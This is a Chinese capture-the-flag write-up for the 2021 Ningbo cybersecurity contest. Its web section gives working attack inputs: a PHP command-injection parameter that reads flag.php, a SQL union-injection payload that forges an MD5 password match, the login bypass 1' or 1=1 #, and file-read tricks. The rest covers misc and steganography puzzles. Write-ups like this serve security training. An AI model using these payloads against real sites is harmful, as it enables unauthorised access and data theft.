2021宁波市第四届网络安全大赛
Posted huamanggg
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2021宁波市第四届网络安全大赛相关的知识,希望对你有一定的参考价值。
简单的php
和nepctf那题litter_thick一样的
找到有一个flag.php
然后写个马进去,cat一下flag.php就可以了
?1=echo `cat flag.php`;
index
index.php~有源码
<?php
include ("config.php");
$db = mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($database, $db) or die("Could not select database");
mysql_query("set names utf8");
if ($conn->connect_error) {
die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);
$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (! $query) {
printf("Error: %s\\n", mysqli_error($conn));
exit();
}
$row = mysql_fetch_array($query);
if (($row[pw]) && (! strcasecmp($pass, $row[pw]))) {
echo "<p>Logged in! Key: " . $flag . " </p>";
} else {
echo ("<p>Log in failure!</p>");
}
strcasecmp()
函数,匹配到相等就返回0
满足这个式子就可以了
($row[pw]) && (! strcasecmp($pass, $row[pw]))
那么只要求$row(pw)和我们传进去password一样就可以了
payload:
user=1' union select '71f67e393280fa78ab9f6ce81b54bc72'#&pass=jxnu
getflag
直接访问/flag.php
helloworld
.index.php.swp找到备份文件
<?php
require_once('config.php');
$file = $_GET['file'];
$file_text = file_get_contents($file);
print_r($file_text);
if($file_text == $test666){
print_r($flag);
}
?>
那就直接读取config.php
sss607
伪协议再打一下就可以了
文件管理网站
guest可以登录,但是什么功能都没有
这个万能密码可以登录进去1' or 1=1 #
,身份还是guest
看了一下目录扫描的结果,直接扫到1.htaccess。。。
直接访问,有一个
拿到flag
简单编码
jsfuck,运行一下是这个
美丽的小姐
CRC出问题,改宽高就好了
音符
文件尾写了password为ejfg
音符解码
简单乘法
jpg隐写,jphide
但是少了密码
听雨寻知音
010看了一下又一个png头
foremost分离出一个二维码
修复一下定位点
打开一个网址
滴滴答滴滴答滴滴滴答滴答滴滴答滴滴答答滴滴滴滴滴答答答滴答
莫斯电码
…-…-…-.-…-…–…—.-
但是不知道怎么分割
nike
是一个比赛的原题
代码美化一下
然后py2跑
改一下
跑出
得到flag
以上是关于2021宁波市第四届网络安全大赛的主要内容,如果未能解决你的问题,请参考以下文章
第二届“祥云杯”网络安全大赛暨吉林省第四届大学生网络安全大赛 WriteUp 2021年祥云杯misc
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it